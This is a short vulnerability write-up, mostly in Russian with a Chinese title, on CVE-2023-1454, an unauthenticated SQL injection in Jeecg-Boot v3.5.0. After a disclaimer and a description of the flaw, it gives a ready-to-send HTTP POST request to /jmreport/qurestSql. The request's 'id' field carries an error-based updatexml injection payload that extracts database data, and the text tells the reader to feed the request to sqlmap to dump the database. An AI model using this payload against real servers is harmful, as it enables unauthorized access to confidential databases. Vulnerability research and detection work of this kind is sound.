
CVE-2023-1454漏洞检测脚本
Сценарий обнаружения уязвимости CVE-2023-1454
Данный материал предоставлен только для ознакомления. Несанкционированное использование технической информации и инструментов, описанных в статье, для вторжения в любые компьютерные системы запрещено. Автор не несет ответственности за прямые или косвенные последствия и убытки, возникшие в результате использования предоставленной информации.
Краткое введение Jeecg-Boot — это низкокодовая платформа разработки на основе генератора кода. Она предоставляет ряд функций, таких как генераторы кода, шаблонизаторы, управление разрешениями, словари данных, импорт/экспорт данных и т. д., что помогает разработчикам быстро создавать корпоративные приложения.
Обзор уязвимости Java-низкокодовая платформа корпоративных веб-приложений Jeecg-Boot (v3.5.0) использует jimureport-spring-boot-starter-1.5.6.jar. В Jeecg-Boot имеется дефект фильтрации специальных символов. В версии v3.5.0 с фронтендом на Vue3 существует неавторизованная SQL-инъекция. Точка уязвимости находится в пути /querySql: при вызове SQL-запроса параметр id не обрабатывается, что позволяет напрямую выполнять инъекцию с выводом ошибок. Неавторизованный удаленный злоумышленник, конструируя специальную строку, может получить конфиденциальную информацию из целевой базы данных.
Затрагиваемые версии Затронутая версия: Jeecg-Boot = v3.5.0
Сохраните пакет данных в txt и используйте sqlmap для получения данных
POST /jmreport/qurestSql HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}